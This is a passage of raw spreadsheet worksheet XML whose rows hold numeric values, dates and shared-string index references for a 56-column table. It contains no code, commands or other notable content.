        <v>86</v>
      </c>
      <c r="AU226">
        <v>24</v>
      </c>
      <c r="AV226">
        <v>1</v>
      </c>
      <c r="AW226">
        <v>9</v>
      </c>
      <c r="AX226">
        <v>14</v>
      </c>
      <c r="AY226">
        <v>23</v>
      </c>
      <c r="AZ226">
        <v>73</v>
      </c>
      <c r="BA226" t="s">
        <v>16674</v>
      </c>
      <c r="BB226" t="s">
        <v>14515</v>
      </c>
      <c r="BC226" t="s">
        <v>11991</v>
      </c>
      <c r="BD226" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="227" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A227">
        <v>792</v>
      </c>
      <c r="B227" t="s">
        <v>1944</v>
      </c>
      <c r="C227" t="s">
        <v>157</v>
      </c>
      <c r="D227" t="s">
        <v>1945</v>
      </c>
      <c r="E227" t="s">
        <v>843</v>
      </c>
      <c r="F227" t="s">
        <v>1946</v>
      </c>
      <c r="G227" s="1">
        <v>44298</v>
      </c>
      <c r="H227">
        <v>6241</v>
      </c>
      <c r="I227">
        <v>6241</v>
      </c>
      <c r="J227">
        <v>0</v>
      </c>
      <c r="K227">
        <v>1</v>
      </c>
      <c r="L227">
        <v>0</v>
      </c>
      <c r="M227">
        <v>0</v>
      </c>
      <c r="N227">
        <v>0</v>
      </c>
      <c r="O227">
        <v>0</v>
      </c>
      <c r="P227">
        <v>0</v>
      </c>
      <c r="Q227">
        <v>1</v>
      </c>
      <c r="R227">
        <v>4</v>
      </c>
      <c r="S227">
        <v>0</v>
      </c>
      <c r="T227">
        <v>1</v>
      </c>
      <c r="U227">
        <v>0</v>
      </c>
      <c r="V227">
        <v>1000</v>
      </c>
      <c r="W227">
        <v>0</v>
      </c>
      <c r="X227">
        <v>0</v>
      </c>
      <c r="Y227">
        <v>0</v>
      </c>
      <c r="Z227">
        <v>0</v>
      </c>
      <c r="AA227">
        <v>0</v>
      </c>
      <c r="AB227">
        <v>100</v>
      </c>
      <c r="AC227">
        <v>1000</v>
      </c>
      <c r="AD227">
        <v>0</v>
      </c>
      <c r="AE227">
        <v>500</v>
      </c>
      <c r="AF227" t="s">
        <v>1947</v>
      </c>
      <c r="AG227">
        <v>61257</v>
      </c>
      <c r="AH227">
        <v>16</v>
      </c>
      <c r="AJ227">
        <v>242</v>
      </c>
      <c r="AK227" t="s">
        <v>1164</v>
      </c>
      <c r="AL227" t="s">
        <v>1948</v>
      </c>
      <c r="AM227" t="s">
        <v>1949</v>
      </c>
      <c r="AN227" t="s">
        <v>55</v>
      </c>
      <c r="AO227">
        <v>2014</v>
      </c>
      <c r="AP227" t="s">
        <v>1950</v>
      </c>
      <c r="AQ227" t="s">
        <v>1951</v>
      </c>
      <c r="AR227" t="s">
        <v>1952</v>
      </c>
      <c r="AS227" t="s">
        <v>71</v>
      </c>
      <c r="AT227" t="s">
        <v>58</v>
      </c>
      <c r="AU227">
        <v>25</v>
      </c>
      <c r="AV227">
        <v>0</v>
      </c>
      <c r="AW227">
        <v>2</v>
      </c>
      <c r="AX227">
        <v>0</v>
      </c>
      <c r="AY227">
        <v>4</v>
      </c>
      <c r="AZ227">
        <v>2</v>
      </c>
      <c r="BA227" t="s">
        <v>16758</v>
      </c>
      <c r="BB227" t="s">
        <v>14859</v>
      </c>
      <c r="BC227">
        <v>0</v>
      </c>
      <c r="BD227" t="s">
        <v>12005</v>
      </c>
    </row>
    <row r="228" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A228">
        <v>331</v>
      </c>
      <c r="B228" t="s">
        <v>1953</v>
      </c>
      <c r="C228" t="s">
        <v>88</v>
      </c>
      <c r="D228" t="s">
        <v>1954</v>
      </c>
      <c r="E228" t="s">
        <v>111</v>
      </c>
      <c r="F228" t="s">
        <v>1955</v>
      </c>
      <c r="G228" s="1">
        <v>44120</v>
      </c>
      <c r="H228">
        <v>6271</v>
      </c>
      <c r="I228">
        <v>6271</v>
      </c>
      <c r="J228">
        <v>3</v>
      </c>
      <c r="K228">
        <v>0</v>
      </c>
      <c r="L228">
        <v>0</v>
      </c>
      <c r="M228">
        <v>0</v>
      </c>
      <c r="N228">
        <v>0</v>
      </c>
      <c r="O228">
        <v>0</v>
      </c>
      <c r="P228">
        <v>0</v>
      </c>
      <c r="Q228">
        <v>0</v>
      </c>
      <c r="R228">
        <v>3</v>
      </c>
      <c r="S228">
        <v>0</v>
      </c>
      <c r="T228">
        <v>2</v>
      </c>
      <c r="U228">
        <v>275000</v>
      </c>
      <c r="V228">
        <v>0</v>
      </c>
      <c r="W228">
        <v>0</v>
      </c>
      <c r="X228">
        <v>0</v>
      </c>
      <c r="Y228">
        <v>0</v>
      </c>
      <c r="Z228">
        <v>0</v>
      </c>
      <c r="AA228">
        <v>0</v>
      </c>
      <c r="AB228">
        <v>0</v>
      </c>
      <c r="AC228">
        <v>12000</v>
      </c>
      <c r="AD228">
        <v>0</v>
      </c>
      <c r="AE228">
        <v>0</v>
      </c>
      <c r="AF228" t="s">
        <v>1956</v>
      </c>
      <c r="AG228">
        <v>80222</v>
      </c>
      <c r="AH228">
        <v>17</v>
      </c>
      <c r="AJ228">
        <v>282</v>
      </c>
      <c r="AK228" t="s">
        <v>592</v>
      </c>
      <c r="AL228" t="s">
        <v>593</v>
      </c>
      <c r="AM228" t="s">
        <v>1957</v>
      </c>
      <c r="AN228" t="s">
        <v>55</v>
      </c>
      <c r="AO228">
        <v>1998</v>
      </c>
      <c r="AP228">
        <v>361728236</v>
      </c>
      <c r="AQ228" t="s">
        <v>1958</v>
      </c>
      <c r="AR228" t="s">
        <v>1956</v>
      </c>
      <c r="AS228" t="s">
        <v>71</v>
      </c>
      <c r="AT228" t="s">
        <v>58</v>
      </c>
      <c r="AU228">
        <v>0</v>
      </c>
      <c r="AV228">
        <v>0</v>
      </c>
      <c r="AW228">
        <v>0</v>
      </c>
      <c r="AX228">
        <v>0</v>
      </c>
      <c r="AY228">
        <v>13</v>
      </c>
      <c r="AZ228">
        <v>5</v>
      </c>
      <c r="BA228" t="s">
        <v>17500</v>
      </c>
      <c r="BB228" t="s">
        <v>14487</v>
      </c>
      <c r="BC228">
        <v>0</v>
      </c>
      <c r="BD228" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="229" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A229">
        <v>506</v>
      </c>
      <c r="B229" t="s">
        <v>1959</v>
      </c>
      <c r="C229" t="s">
        <v>477</v>
      </c>
      <c r="D229" t="s">
        <v>1960</v>
      </c>
      <c r="E229" t="s">
        <v>300</v>
      </c>
      <c r="F229" t="s">
        <v>1961</v>
      </c>
      <c r="G229" s="1">
        <v>44103</v>
      </c>
      <c r="H229">
        <v>6341</v>
      </c>
      <c r="I229">
        <v>6341</v>
      </c>
      <c r="J229">
        <v>1</v>
      </c>
      <c r="K229">
        <v>2</v>
      </c>
      <c r="L229">
        <v>3</v>
      </c>
      <c r="M229">
        <v>0</v>
      </c>
      <c r="N229">
        <v>0</v>
      </c>
      <c r="O229">
        <v>0</v>
      </c>
      <c r="P229">
        <v>0</v>
      </c>
      <c r="Q229">
        <v>0</v>
      </c>
      <c r="R229">
        <v>3</v>
      </c>
      <c r="S229">
        <v>0</v>
      </c>
      <c r="T229">
        <v>1</v>
      </c>
      <c r="U229">
        <v>300000</v>
      </c>
      <c r="V229">
        <v>2</v>
      </c>
      <c r="W229">
        <v>10000</v>
      </c>
      <c r="X229">
        <v>0</v>
      </c>
      <c r="Y229">
        <v>0</v>
      </c>
      <c r="Z229">
        <v>0</v>
      </c>
      <c r="AA229">
        <v>0</v>
      </c>
      <c r="AB229">
        <v>0</v>
      </c>
      <c r="AC229">
        <v>12000</v>
      </c>
      <c r="AD229">
        <v>0</v>
      </c>
      <c r="AE229">
        <v>20000</v>
      </c>
      <c r="AF229" t="s">
        <v>1962</v>
      </c>
      <c r="AG229">
        <v>95542</v>
      </c>
      <c r="AH229">
        <v>29</v>
      </c>
      <c r="AJ229">
        <v>383</v>
      </c>
      <c r="AK229" t="s">
        <v>1963</v>
      </c>
      <c r="AL229" t="s">
        <v>1964</v>
      </c>
      <c r="AM229" t="s">
        <v>1965</v>
      </c>
      <c r="AN229" t="s">
        <v>82</v>
      </c>
      <c r="AO229">
        <v>2008</v>
      </c>
      <c r="AP229">
        <v>43822303671</v>
      </c>
      <c r="AQ229" t="s">
        <v>1966</v>
      </c>
      <c r="AR229" t="s">
        <v>1967</v>
      </c>
      <c r="AS229" t="s">
        <v>71</v>
      </c>
      <c r="AT229" t="s">
        <v>86</v>
      </c>
      <c r="AU229">
        <v>25</v>
      </c>
      <c r="AV229">
        <v>3</v>
      </c>
      <c r="AW229">
        <v>5</v>
      </c>
      <c r="AX229">
        <v>5</v>
      </c>
      <c r="AY229">
        <v>70</v>
      </c>
      <c r="AZ229">
        <v>85</v>
      </c>
      <c r="BA229">
        <v>0</v>
      </c>
      <c r="BB229" t="s">
        <v>14628</v>
      </c>
      <c r="BC229" t="s">
        <v>9952</v>
      </c>
      <c r="BD229" t="s">
        <v>12063</v>
      </c>
    </row>
    <row r="230" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A230">
        <v>57</v>
      </c>
      <c r="B230" t="s">
        <v>1968</v>
      </c>
      <c r="C230" t="s">
        <v>99</v>
      </c>
      <c r="D230" t="s">
        <v>1969</v>
      </c>
      <c r="E230" t="s">
        <v>300</v>
      </c>
      <c r="F230" t="s">
        <v>1970</v>
      </c>
      <c r="G230" s="1">
        <v>44153</v>
      </c>
      <c r="H230">
        <v>6350</v>
      </c>
      <c r="I230">
        <v>6350</v>
      </c>
      <c r="J230">
        <v>1</v>
      </c>
      <c r="K230">
        <v>1</v>
      </c>
      <c r="L230">
        <v>0</v>
      </c>
      <c r="M230">
        <v>0</v>
      </c>
      <c r="N230">
        <v>0</v>
      </c>
      <c r="O230">
        <v>0</v>
      </c>
      <c r="P230">
        <v>0</v>
      </c>
      <c r="Q230">
        <v>0</v>
      </c>
      <c r="R230">
        <v>0</v>
      </c>
      <c r="S230">
        <v>0</v>
      </c>
      <c r="T230">
        <v>0</v>
      </c>
      <c r="U230">
        <v>561000</v>
      </c>
      <c r="V230">
        <v>229890</v>
      </c>
      <c r="W230">
        <v>0</v>
      </c>
      <c r="X230">
        <v>0</v>
      </c>
      <c r="Y230">
        <v>0</v>
      </c>
      <c r="Z230">
        <v>0</v>
      </c>
      <c r="AA230">
        <v>0</v>
      </c>
      <c r="AB230">
        <v>0</v>
      </c>
      <c r="AC230">
        <v>0</v>
      </c>
      <c r="AD230">
        <v>0</v>
      </c>
      <c r="AE230">
        <v>0</v>
      </c>
      <c r="AF230" t="s">
        <v>1971</v>
      </c>
      <c r="AG230">
        <v>14440</v>
      </c>
      <c r="AH230">
        <v>12</v>
      </c>
      <c r="AJ230">
        <v>160</v>
      </c>
      <c r="AK230" t="s">
        <v>114</v>
      </c>
      <c r="AL230" t="s">
        <v>114</v>
      </c>
      <c r="AM230" t="s">
        <v>1972</v>
      </c>
      <c r="AN230" t="s">
        <v>55</v>
      </c>
      <c r="AO230">
        <v>2015</v>
      </c>
      <c r="AP230">
        <v>2166696666</v>
      </c>
      <c r="AQ230" t="s">
        <v>1973</v>
      </c>
      <c r="AR230" t="s">
        <v>1974</v>
      </c>
      <c r="AS230" t="s">
        <v>71</v>
      </c>
      <c r="AT230" t="s">
        <v>58</v>
      </c>
      <c r="AU230">
        <v>23</v>
      </c>
      <c r="AV230">
        <v>1</v>
      </c>
      <c r="AW230">
        <v>0</v>
      </c>
      <c r="AX230">
        <v>2</v>
      </c>
      <c r="AY230">
        <v>7</v>
      </c>
      <c r="AZ230">
        <v>3</v>
      </c>
      <c r="BA230" t="s">
        <v>16598</v>
      </c>
      <c r="BB230" t="s">
        <v>14259</v>
      </c>
      <c r="BC230" t="s">
        <v>10853</v>
      </c>
      <c r="BD230">
        <v>0</v>
      </c>
    </row>
    <row r="231" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A231">
        <v>755</v>
      </c>
      <c r="B231" t="s">
        <v>1975</v>
      </c>
      <c r="C231" t="s">
        <v>199</v>
      </c>
      <c r="D231" t="s">
        <v>1976</v>
      </c>
      <c r="E231" t="s">
        <v>1977</v>
      </c>
      <c r="F231" t="s">
        <v>1978</v>
      </c>
      <c r="G231" s="1">
        <v>44253</v>
      </c>
      <c r="H231">
        <v>6410</v>
      </c>
      <c r="I231">
        <v>6410</v>
      </c>
      <c r="J231">
        <v>0</v>
      </c>
      <c r="K231">
        <v>0</v>
      </c>
      <c r="L231">
        <v>0</v>
      </c>
      <c r="M231">
        <v>0</v>
      </c>
      <c r="N231">
        <v>0</v>
      </c>
      <c r="O231">
        <v>0</v>
      </c>
      <c r="P231">
        <v>0</v>
      </c>
      <c r="Q231">
        <v>2</v>
      </c>
      <c r="R231">
        <v>3</v>
      </c>
      <c r="S231">
        <v>0</v>
      </c>
      <c r="T231">
        <v>1</v>
      </c>
      <c r="U231">
        <v>0</v>
      </c>
      <c r="V231">
        <v>0</v>
      </c>
      <c r="W231">
        <v>0</v>
      </c>
      <c r="X231">
        <v>0</v>
      </c>
      <c r="Y231">
        <v>0</v>
      </c>
      <c r="Z231">
        <v>0</v>
      </c>
      <c r="AA231">
        <v>0</v>
      </c>
      <c r="AB231">
        <v>2000</v>
      </c>
      <c r="AC231">
        <v>3000</v>
      </c>
      <c r="AD231">
        <v>0</v>
      </c>
      <c r="AE231">
        <v>50000</v>
      </c>
      <c r="AF231" t="s">
        <v>1979</v>
      </c>
      <c r="AG231">
        <v>24353</v>
      </c>
      <c r="AH231">
        <v>1</v>
      </c>
      <c r="AJ231">
        <v>22</v>
      </c>
      <c r="AK231" t="s">
        <v>1980</v>
      </c>
      <c r="AL231" t="s">
        <v>1981</v>
      </c>
      <c r="AM231" t="s">
        <v>1982</v>
      </c>
      <c r="AN231" t="s">
        <v>55</v>
      </c>
      <c r="AO231">
        <v>2015</v>
      </c>
      <c r="AP231" t="s">
        <v>1983</v>
      </c>
      <c r="AQ231" t="s">
        <v>1984</v>
      </c>
      <c r="AR231" t="s">
        <v>1979</v>
      </c>
      <c r="AS231" t="s">
        <v>57</v>
      </c>
      <c r="AT231" t="s">
        <v>58</v>
      </c>
      <c r="AU231">
        <v>26</v>
      </c>
      <c r="AV231">
        <v>1</v>
      </c>
      <c r="AW231">
        <v>0</v>
      </c>
      <c r="AX231">
        <v>0</v>
      </c>
      <c r="AY231">
        <v>13</v>
      </c>
      <c r="AZ231">
        <v>1</v>
      </c>
      <c r="BA231">
        <v>0</v>
      </c>
      <c r="BB231" t="s">
        <v>14828</v>
      </c>
      <c r="BC231">
        <v>0</v>
      </c>
      <c r="BD231" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="232" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A232">
        <v>660</v>
      </c>
      <c r="B232" t="s">
        <v>1985</v>
      </c>
      <c r="C232" t="s">
        <v>157</v>
      </c>
      <c r="D232" t="s">
        <v>1986</v>
      </c>
      <c r="E232" t="s">
        <v>1346</v>
      </c>
      <c r="F232" t="s">
        <v>1987</v>
      </c>
      <c r="G232" s="1">
        <v>44232</v>
      </c>
      <c r="H232">
        <v>6463</v>
      </c>
      <c r="I232">
        <v>6463</v>
      </c>
      <c r="J232">
        <v>2</v>
      </c>
      <c r="K232">
        <v>1</v>
      </c>
      <c r="L232">
        <v>0</v>
      </c>
      <c r="M232">
        <v>3</v>
      </c>
      <c r="N232">
        <v>0</v>
      </c>
      <c r="O232">
        <v>0</v>
      </c>
      <c r="P232">
        <v>12</v>
      </c>
      <c r="Q232">
        <v>0</v>
      </c>
      <c r="R232">
        <v>0</v>
      </c>
      <c r="S232">
        <v>8</v>
      </c>
      <c r="T232">
        <v>4</v>
      </c>
      <c r="U232">
        <v>400</v>
      </c>
      <c r="V232">
        <v>25</v>
      </c>
      <c r="W232">
        <v>0</v>
      </c>
      <c r="X232">
        <v>15</v>
      </c>
      <c r="Y232">
        <v>0</v>
      </c>
      <c r="Z232">
        <v>0</v>
      </c>
      <c r="AA232">
        <v>15</v>
      </c>
      <c r="AB232">
        <v>0</v>
      </c>
      <c r="AC232">
        <v>0</v>
      </c>
      <c r="AD232">
        <v>15</v>
      </c>
      <c r="AE232">
        <v>1</v>
      </c>
      <c r="AF232" t="s">
        <v>1988</v>
      </c>
      <c r="AG232">
        <v>67154</v>
      </c>
      <c r="AH232">
        <v>16</v>
      </c>
      <c r="AJ232">
        <v>241</v>
      </c>
      <c r="AK232" t="s">
        <v>539</v>
      </c>
      <c r="AL232" t="s">
        <v>539</v>
      </c>
      <c r="AM232" t="s">
        <v>1989</v>
      </c>
      <c r="AN232" t="s">
        <v>55</v>
      </c>
      <c r="AO232">
        <v>1991</v>
      </c>
      <c r="AP232" t="s">
        <v>1990</v>
      </c>
      <c r="AQ232" t="s">
        <v>1991</v>
      </c>
      <c r="AR232" t="s">
        <v>1992</v>
      </c>
      <c r="AS232" t="s">
        <v>71</v>
      </c>
      <c r="AT232" t="s">
        <v>58</v>
      </c>
      <c r="AU232">
        <v>0</v>
      </c>
      <c r="AV232">
        <v>0</v>
      </c>
      <c r="AW232">
        <v>20</v>
      </c>
      <c r="AX232">
        <v>300</v>
      </c>
      <c r="AY232">
        <v>58</v>
      </c>
      <c r="AZ232">
        <v>137</v>
      </c>
      <c r="BA232" t="s">
        <v>16733</v>
      </c>
      <c r="BB232" t="s">
        <v>14757</v>
      </c>
      <c r="BC232">
        <v>0</v>
      </c>
      <c r="BD232" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="233" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A233">
        <v>761</v>
      </c>
      <c r="B233" t="s">
        <v>1993</v>
      </c>
      <c r="C233" t="s">
        <v>88</v>
      </c>
      <c r="D233" t="s">
        <v>1994</v>
      </c>
      <c r="E233" t="s">
        <v>1245</v>
      </c>
      <c r="F233" t="s">
        <v>1995</v>
      </c>
      <c r="G233" s="1">
        <v>44217</v>
      </c>
      <c r="H233">
        <v>6472</v>
      </c>
      <c r="I233">
        <v>6472</v>
      </c>
      <c r="J233">
        <v>0</v>
      </c>
      <c r="K233">
        <v>0</v>
      </c>
      <c r="L233">
        <v>0</v>
      </c>
      <c r="M233">
        <v>0</v>
      </c>
      <c r="N233">
        <v>0</v>
      </c>
      <c r="O233">
        <v>0</v>
      </c>
      <c r="P233">
        <v>0</v>
      </c>
      <c r="Q233">
        <v>0</v>
      </c>
      <c r="R233">
        <v>10</v>
      </c>
      <c r="S233">
        <v>0</v>
      </c>
      <c r="T233">
        <v>0</v>
      </c>
      <c r="U233">
        <v>0</v>
      </c>
      <c r="V233">
        <v>0</v>
      </c>
      <c r="W233">
        <v>0</v>
      </c>
      <c r="X233">
        <v>0</v>
      </c>
      <c r="Y233">
        <v>0</v>
      </c>
      <c r="Z233">
        <v>0</v>
      </c>
      <c r="AA233">
        <v>0</v>
      </c>
      <c r="AB233">
        <v>0</v>
      </c>
      <c r="AC233">
        <v>2500</v>
      </c>
      <c r="AD233">
        <v>0</v>
      </c>
      <c r="AE233">
        <v>0</v>
      </c>
      <c r="AF233" t="s">
        <v>1996</v>
      </c>
      <c r="AG233">
        <v>80229</v>
      </c>
      <c r="AH233">
        <v>17</v>
      </c>
      <c r="AJ233">
        <v>282</v>
      </c>
      <c r="AK233" t="s">
        <v>592</v>
      </c>
      <c r="AL233" t="s">
        <v>1997</v>
      </c>
      <c r="AM233" t="s">
        <v>1998</v>
      </c>
      <c r="AN233" t="s">
        <v>55</v>
      </c>
      <c r="AO233">
        <v>2009</v>
      </c>
      <c r="AP233" t="s">
        <v>1999</v>
      </c>
      <c r="AQ233" t="s">
        <v>2000</v>
      </c>
      <c r="AR233" t="s">
        <v>2001</v>
      </c>
      <c r="AS233" t="s">
        <v>71</v>
      </c>
      <c r="AT233" t="s">
        <v>58</v>
      </c>
      <c r="AU233">
        <v>10</v>
      </c>
      <c r="AV233">
        <v>2</v>
      </c>
      <c r="AW233">
        <v>0</v>
      </c>
      <c r="AX233">
        <v>0</v>
      </c>
      <c r="AY233">
        <v>5</v>
      </c>
      <c r="AZ233">
        <v>1</v>
      </c>
      <c r="BA233" t="s">
        <v>17534</v>
      </c>
      <c r="BB233" t="s">
        <v>14833</v>
      </c>
      <c r="BC233" t="s">
        <v>12132</v>
      </c>
      <c r="BD233" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="234" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A234">
        <v>739</v>
      </c>
      <c r="B234" t="s">
        <v>2002</v>
      </c>
      <c r="C234" t="s">
        <v>607</v>
      </c>
      <c r="D234" t="s">
        <v>2003</v>
      </c>
      <c r="E234" t="s">
        <v>142</v>
      </c>
      <c r="F234" t="s">
        <v>673</v>
      </c>
      <c r="G234" s="1">
        <v>44152</v>
      </c>
      <c r="H234">
        <v>6482</v>
      </c>
      <c r="I234">
        <v>6482</v>
      </c>
      <c r="J234">
        <v>2</v>
      </c>
      <c r="K234">
        <v>0</v>
      </c>
      <c r="L234">
        <v>0</v>
      </c>
      <c r="M234">
        <v>3</v>
      </c>
      <c r="N234">
        <v>0</v>
      </c>
      <c r="O234">
        <v>0</v>
      </c>
      <c r="P234">
        <v>0</v>
      </c>
      <c r="Q234">
        <v>4</v>
      </c>
      <c r="R234">
        <v>90</v>
      </c>
      <c r="S234">
        <v>1</v>
      </c>
      <c r="T234">
        <v>1</v>
      </c>
      <c r="U234">
        <v>248400</v>
      </c>
      <c r="V234">
        <v>0</v>
      </c>
      <c r="W234">
        <v>0</v>
      </c>
      <c r="X234">
        <v>990</v>
      </c>
      <c r="Y234">
        <v>0</v>
      </c>
      <c r="Z234">
        <v>0</v>
      </c>
      <c r="AA234">
        <v>0</v>
      </c>
      <c r="AB234">
        <v>800</v>
      </c>
      <c r="AC234">
        <v>180000</v>
      </c>
      <c r="AD234">
        <v>1</v>
      </c>
      <c r="AE234">
        <v>50000</v>
      </c>
      <c r="AF234" t="s">
        <v>2004</v>
      </c>
      <c r="AG234">
        <v>77126</v>
      </c>
      <c r="AH234">
        <v>24</v>
      </c>
      <c r="AJ234">
        <v>370</v>
      </c>
      <c r="AK234" t="s">
        <v>675</v>
      </c>
      <c r="AL234" t="s">
        <v>2005</v>
      </c>
      <c r="AM234" t="s">
        <v>2006</v>
      </c>
      <c r="AN234" t="s">
        <v>82</v>
      </c>
      <c r="AO234">
        <v>2012</v>
      </c>
      <c r="AP234" t="s">
        <v>2007</v>
      </c>
      <c r="AQ234" t="s">
        <v>2008</v>
      </c>
      <c r="AR234" t="s">
        <v>2009</v>
      </c>
      <c r="AS234" t="s">
        <v>71</v>
      </c>
      <c r="AT234" t="s">
        <v>86</v>
      </c>
      <c r="AU234">
        <v>24</v>
      </c>
      <c r="AV234">
        <v>2</v>
      </c>
      <c r="AW234">
        <v>100</v>
      </c>
      <c r="AX234">
        <v>164</v>
      </c>
      <c r="AY234">
        <v>120</v>
      </c>
      <c r="AZ234">
        <v>220</v>
      </c>
      <c r="BA234" t="s">
        <v>16648</v>
      </c>
      <c r="BB234" t="s">
        <v>14816</v>
      </c>
      <c r="BC234" t="s">
        <v>12269</v>
      </c>
      <c r="BD234" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="235" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A235">
        <v>138</v>
      </c>
      <c r="B235" t="s">
        <v>2010</v>
      </c>
      <c r="C235" t="s">
        <v>99</v>
      </c>
      <c r="D235" t="s">
        <v>2011</v>
      </c>
      <c r="E235" t="s">
        <v>300</v>
      </c>
      <c r="F235" t="s">
        <v>2012</v>
      </c>
      <c r="G235" s="1">
        <v>44161</v>
      </c>
      <c r="H235">
        <v>6666</v>
      </c>
      <c r="I235">
        <v>6666</v>
      </c>
      <c r="J235">
        <v>1</v>
      </c>
      <c r="K235">
        <v>1</v>
      </c>
      <c r="L235">
        <v>2</v>
      </c>
      <c r="M235">
        <v>3</v>
      </c>
      <c r="N235">
        <v>500</v>
      </c>
      <c r="O235">
        <v>0</v>
      </c>
      <c r="P235">
        <v>0</v>
      </c>
      <c r="Q235">
        <v>0</v>
      </c>
      <c r="R235">
        <v>0</v>
      </c>
      <c r="S235">
        <v>0</v>
      </c>
      <c r="T235">
        <v>0</v>
      </c>
      <c r="U235">
        <v>1200000</v>
      </c>
      <c r="V235">
        <v>90000</v>
      </c>
      <c r="W235">
        <v>2080</v>
      </c>
      <c r="X235">
        <v>3150</v>
      </c>
      <c r="Y235">
        <v>0</v>
      </c>
      <c r="Z235">
        <v>0</v>
      </c>
      <c r="AA235">
        <v>0</v>
      </c>
      <c r="AB235">
        <v>0</v>
      </c>
      <c r="AC235">
        <v>0</v>
      </c>
      <c r="AD235">
        <v>0</v>
      </c>
      <c r="AE235">
        <v>0</v>
      </c>
      <c r="AF235" t="s">
        <v>2013</v>
      </c>
      <c r="AG235">
        <v>14440</v>
      </c>
      <c r="AH235">
        <v>12</v>
      </c>
      <c r="AJ235">
        <v>160</v>
      </c>
      <c r="AK235" t="s">
        <v>114</v>
      </c>
      <c r="AL235" t="s">
        <v>114</v>
      </c>
      <c r="AM235" t="s">
        <v>2014</v>
      </c>
      <c r="AN235" t="s">
        <v>55</v>
      </c>
      <c r="AO235">
        <v>2001</v>
      </c>
      <c r="AP235" t="s">
        <v>2015</v>
      </c>
      <c r="AQ235" t="s">
        <v>1973</v>
      </c>
      <c r="AR235" t="s">
        <v>2013</v>
      </c>
      <c r="AS235" t="s">
        <v>71</v>
      </c>
      <c r="AT235" t="s">
        <v>58</v>
      </c>
      <c r="AU235">
        <v>22</v>
      </c>
      <c r="AV235">
        <v>1</v>
      </c>
      <c r="AW235">
        <v>11</v>
      </c>
      <c r="AX235">
        <v>2</v>
      </c>
      <c r="AY235">
        <v>17</v>
      </c>
      <c r="AZ235">
        <v>4</v>
      </c>
      <c r="BA235" t="s">
        <v>16619</v>
      </c>
      <c r="BB235" t="s">
        <v>14274</v>
      </c>
      <c r="BC235" t="s">
        <v>10853</v>
      </c>
      <c r="BD235">
        <v>0</v>
      </c>
    </row>
    <row r="236" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A236">
        <v>48</v>
      </c>
      <c r="B236" t="s">
        <v>2016</v>
      </c>
      <c r="C236" t="s">
        <v>99</v>
      </c>
      <c r="D236" t="s">
        <v>2017</v>
      </c>
      <c r="E236" t="s">
        <v>142</v>
      </c>
      <c r="F236" t="s">
        <v>2018</v>
      </c>
      <c r="G236" s="1">
        <v>44187</v>
      </c>
      <c r="H236">
        <v>6712</v>
      </c>
      <c r="I236">
        <v>6712</v>
      </c>
      <c r="J236">
        <v>2</v>
      </c>
      <c r="K236">
        <v>0</v>
      </c>
      <c r="L236">
        <v>0</v>
      </c>
      <c r="M236">
        <v>0</v>
      </c>
      <c r="N236">
        <v>0</v>
      </c>
      <c r="O236">
        <v>0</v>
      </c>
      <c r="P236">
        <v>0</v>
      </c>
      <c r="Q236">
        <v>0</v>
      </c>
      <c r="R236">
        <v>0</v>
      </c>
      <c r="S236">
        <v>0</v>
      </c>
      <c r="T236">
        <v>0</v>
      </c>
      <c r="U236">
        <v>600</v>
      </c>
      <c r="V236">
        <v>0</v>
      </c>
      <c r="W236">
        <v>0</v>
      </c>
      <c r="X236">
        <v>0</v>
      </c>
      <c r="Y236">
        <v>0</v>
      </c>
      <c r="Z236">
        <v>0</v>
      </c>
      <c r="AA236">
        <v>0</v>
      </c>
      <c r="AB236">
        <v>0</v>
      </c>
      <c r="AC236">
        <v>0</v>
      </c>
      <c r="AD236">
        <v>0</v>
      </c>
      <c r="AE236">
        <v>0</v>
      </c>
      <c r="AF236" t="s">
        <v>2019</v>
      </c>
      <c r="AG236">
        <v>14440</v>
      </c>
      <c r="AH236">
        <v>12</v>
      </c>
      <c r="AJ236">
        <v>160</v>
      </c>
      <c r="AK236" t="s">
        <v>114</v>
      </c>
      <c r="AL236" t="s">
        <v>114</v>
      </c>
      <c r="AM236" t="s">
        <v>2020</v>
      </c>
      <c r="AN236" t="s">
        <v>55</v>
      </c>
      <c r="AO236">
        <v>2012</v>
      </c>
      <c r="AP236">
        <v>2166677889</v>
      </c>
      <c r="AQ236">
        <v>87780957708</v>
      </c>
      <c r="AR236" t="s">
        <v>2019</v>
      </c>
      <c r="AS236" t="s">
        <v>71</v>
      </c>
      <c r="AT236" t="s">
        <v>58</v>
      </c>
      <c r="AU236">
        <v>27</v>
      </c>
      <c r="AV236">
        <v>0</v>
      </c>
      <c r="AW236">
        <v>0</v>
      </c>
      <c r="AX236">
        <v>0</v>
      </c>
      <c r="AY236">
        <v>36</v>
      </c>
      <c r="AZ236">
        <v>10</v>
      </c>
      <c r="BA236" t="s">
        <v>16592</v>
      </c>
      <c r="BB236" t="s">
        <v>14250</v>
      </c>
      <c r="BC236" t="s">
        <v>9550</v>
      </c>
      <c r="BD236">
        <v>0</v>
      </c>
    </row>
    <row r="237" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A237">
        <v>486</v>
      </c>
      <c r="B237" t="s">
        <v>2021</v>
      </c>
      <c r="C237" t="s">
        <v>477</v>
      </c>
      <c r="D237" t="s">
        <v>2022</v>
      </c>
      <c r="E237" t="s">
        <v>2023</v>
      </c>
      <c r="F237" t="s">
        <v>2024</v>
      </c>
      <c r="G237" s="1">
        <v>44188</v>
      </c>
      <c r="H237">
        <v>6762</v>
      </c>
      <c r="I237">
        <v>6762</v>
      </c>
      <c r="J237">
        <v>2</v>
      </c>
      <c r="K237">
        <v>1</v>
      </c>
      <c r="L237">
        <v>2</v>
      </c>
      <c r="M237">
        <v>0</v>
      </c>
      <c r="N237">
        <v>0</v>
      </c>
      <c r="O237">
        <v>2</v>
      </c>
      <c r="P237">
        <v>2</v>
